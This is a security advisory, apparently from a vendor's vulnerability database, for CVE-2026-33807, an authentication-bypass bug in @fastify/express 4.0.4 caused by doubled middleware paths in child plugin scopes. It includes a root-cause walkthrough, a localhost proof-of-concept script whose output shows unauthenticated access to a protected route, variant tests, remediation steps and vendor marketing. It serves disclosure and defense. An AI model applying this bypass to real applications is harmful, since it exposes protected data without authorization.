Summary
@fastify/express's middleware path doubling causes authentication bypass in child plugin scopes
Full technical description
@fastify/express v4.0.4 contains a path handling bug in the onRegister function that causes middleware paths to be doubled when inherited by child plugins. This results in complete bypass of Express middleware security controls for all routes defined within child plugin scopes that share a prefix with parent-scoped middleware. No special configuration is required, this affects the default Fastify configuration.
Details
The vulnerability exists in the onRegister function at index.js lines 92-101. When a child plugin is registered with a prefix, the onRegister hook copies middleware from the parent scope and re-registers it using instance.use(...middleware). However, the middleware paths stored in kMiddlewares are already prefixed from their original registration.
The call flow demonstrates the problem:
- Parent scope registers middleware:
app.use('/admin', authFn),use()calculates path as'' + '/admin' = '/admin', stores['/admin', authFn]inkMiddlewares - Child plugin registers with
{ prefix: '/admin' }, triggersonRegister(instance) onRegistercopies parent middleware and callsinstance.use('/admin', authFn)on child- Child's
use()function calculates path as'/admin' + '/admin' = '/admin/admin', registers middleware with doubled path - Routes in child scope use the child's Express instance, where middleware is registered under the incorrect path
/admin/admin - Requests to
/admin/secretdon't match/admin/admin, middleware is silently skipped
The root cause is in the use() function at lines 25-26, which always prepends this.prefix to string paths, combined with onRegister re-calling use() with already-prefixed paths.
PoC
const fastify = require('fastify');
const http = require('http');
function get(port, url) {
return new Promise((resolve, reject) => {
http.get('http://localhost:' + port + url, (res) => {
let data = '';
res.on('data', (chunk) => data += chunk);
res.on('end', () => resolve({ status: res.statusCode, body: data }));
}).on('error', reject);
});
}
async function test() {
const app = fastify({ logger: false });
await app.register(require('@fastify/express'));
// Middleware enforcing auth on /admin routes
app.use('/admin', function(req, res, next) {
if (!req.headers.authorization) {
res.statusCode = 403;
res.setHeader('content-type', 'application/json');
res.end(JSON.stringify({ error: 'Forbidden' }));
return;
}
next();
});
// Root scope route, middleware works correctly
app.get('/admin/root-data', async () => ({ data: 'root-secret' }));
// Child scope route, middleware BYPASSED
await app.register(async function(child) {
child.get('/secret', async () => ({ data: 'child-secret' }));
}, { prefix: '/admin' });
await app.listen({ port: 19876, host: '0.0.0.0' });
// Root scope: correctly blocked
let r = await get(19876, '/admin/root-data');
console.log('/admin/root-data (no auth):', r.status, r.body);
// Output: 403 {"error":"Forbidden"}
// Child scope: BYPASSED, secret data returned without auth
r = await get(19876, '/admin/secret');
console.log('/admin/secret (no auth):', r.status, r.body);
// Output: 200 {"data":"child-secret"}
await app.close();
}
test();
Actual output:
/admin/root-data (no auth): 403 {"error":"Forbidden"}
/admin/secret (no auth): 200 {"data":"child-secret"}
Affected Versions
@fastify/expressv4.0.4 (latest at time of discovery)- Fastify 5.x in default configuration
- No special router options required (
ignoreDuplicateSlashesnot needed) - Affects any child plugin registration where the prefix overlaps with middleware path scoping
- Does NOT affect middleware registered without path scoping (global middleware)
- Does NOT affect middleware registered on root path (
/) due to special case handling
Variant Testing
| Scenario | Middleware Path | Child Prefix | Result |
|---|---|---|---|
Root route /admin/root-data |
/admin |
N/A | Middleware runs (403) |
Child route /admin/secret |
/admin |
/admin |
BYPASS (200) |
Child route /api/data |
/api |
/api |
BYPASS (200) |
Nested child /admin/sub/data |
/admin |
/admin/sub |
BYPASS, path becomes /admin/sub/admin |
Middleware on / with any child |
/ |
/api |
No bypass, path === '/' && prefix.length > 0 special case |
Impact
Complete bypass of Express middleware security controls for all routes defined in child plugin scopes. Authentication, authorization, rate limiting, CSRF protection, audit logging, and any other middleware-based security mechanisms are silently skipped for affected routes.
- No special request crafting is required, normal requests bypass the middleware
- It affects the idiomatic Fastify plugin pattern commonly used in production
- The bypass is silent with no errors or warnings
- Developers' basic testing of root-scoped routes will pass, masking the vulnerability
- Any child plugin scope that shares a prefix with middleware is affected
Applications using @fastify/express with path-scoped middleware and child plugins with matching prefixes are vulnerable in default configurations.
CVE-2026-33807 has a CVSS score of 9.1 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (4.0.5); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
The onRegister function should store and re-use the original unprefixed middleware paths, or avoid re-calling the use() function entirely. Options include:
- Store the original path and function separately in
kMiddlewaresbefore prefixing - Strip the parent prefix before re-registering in child scopes
- Store already-constructed Express middleware objects rather than re-processing paths
Frequently Asked Questions
- What is CVE-2026-33807? CVE-2026-33807 is a critical-severity security vulnerability in @fastify/express (npm), affecting versions <= 4.0.4. It is fixed in 4.0.5.
- How severe is CVE-2026-33807? CVE-2026-33807 has a CVSS score of 9.1 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of @fastify/express are affected by CVE-2026-33807? @fastify/express (npm) versions <= 4.0.4 is affected.
- Is there a fix for CVE-2026-33807? Yes. CVE-2026-33807 is fixed in 4.0.5. Upgrade to this version or later.
- Is CVE-2026-33807 exploitable, and should I be worried? Whether CVE-2026-33807 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-33807 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-33807? Upgrade
@fastify/expressto 4.0.5 or later.